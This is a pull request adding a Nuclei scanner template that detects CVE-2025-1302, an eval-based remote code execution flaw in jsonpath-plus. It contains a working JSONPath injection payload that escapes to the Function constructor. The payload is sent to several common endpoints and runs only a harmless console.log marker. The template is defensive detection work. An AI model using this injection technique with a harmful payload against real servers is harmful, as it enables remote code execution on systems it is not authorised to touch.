### PR TITLE
add CVE-2025-1302 detection template

### DIFF
--- a/http/cves/2025/CVE-2025-1302.yaml
+++ b/http/cves/2025/CVE-2025-1302.yaml
@@ -1,0 +1,51 @@
+id: CVE-2025-1302
+
+info:
+  name: jsonpath-plus <10.3.0 - Safe Eval RCE Detection
+  author: Jaenact
+  severity: high
+  description: |
+    This template detects CVE-2025-1302 in jsonpath-plus (<10.3.0)
+    using a safe eval()-based payload. The payload uses harmless
+    JavaScript (console.log) to determine if unsafe evaluation occurs.
+    This is a non-exploitive template suitable for safe security testing.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-1302
+    - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
+    - https://github.com/JSONPath-Plus/JSONPath
+    - https://github.com/EQSTLab/CVE-2025-1302
+
+  tags: cve,rce,jsonpath,eval,safe,json,application,js
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/query"
+      - "{{BaseURL}}/jsonpath"
+      - "{{BaseURL}}/api/query"
+      - "{{BaseURL}}/data"
+      - "{{BaseURL}}/parse"
+      - "{{BaseURL}}/filter"
+      - "{{BaseURL}}/expression"
+
+    headers:
+      Content-Type: application/json
+
+    body: |
+      {
+        "path":
+        "$..[?(EQST=''[['constructor']][['constructor']]('console.log(\"nuclei-safe\")');EQST())]"
+      }
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'nuclei-safe'
+
+      - type: word
+        part: body
+        negative: true
+        words:
+          - 'EQST'
+          - '"path"'


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2025-1302 detection template for `jsonpath-plus` (<10.3.0)
- This vulnerability is caused by unsafe use of `eval()` in the library's JSONPath evaluation logic.
- The template uses a safe payload (`console.log("nuclei-safe")`) to verify if the input is being evaluated via `eval()`.
- This is a non-exploitive detection mechanism designed for safe testing.

**References:**
- https://nvd.nist.gov/vuln/detail/CVE-2025-1302
- https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
- https://github.com/JSONPath-Plus/JSONPath
- https://github.com/EQSTLab/CVE-2025-1302

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

- Verified using Docker PoC environment: https://github.com/EQSTLab/CVE-2025-1302
- Scan command:
  ```bash
  nuclei -t cves/2025/CVE-2025-1302.yaml -u http://localhost:3000 -debug
  ```
- Matched endpoint: `/query`
- Matched keyword in response: `nuclei-safe`
- Confirmed matcher bypasses reflection and only matches on actual eval execution
- Other tested paths: `/jsonpath`, `/api/query`, `/data`, `/parse`, `/filter`, `/expression` → 404

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)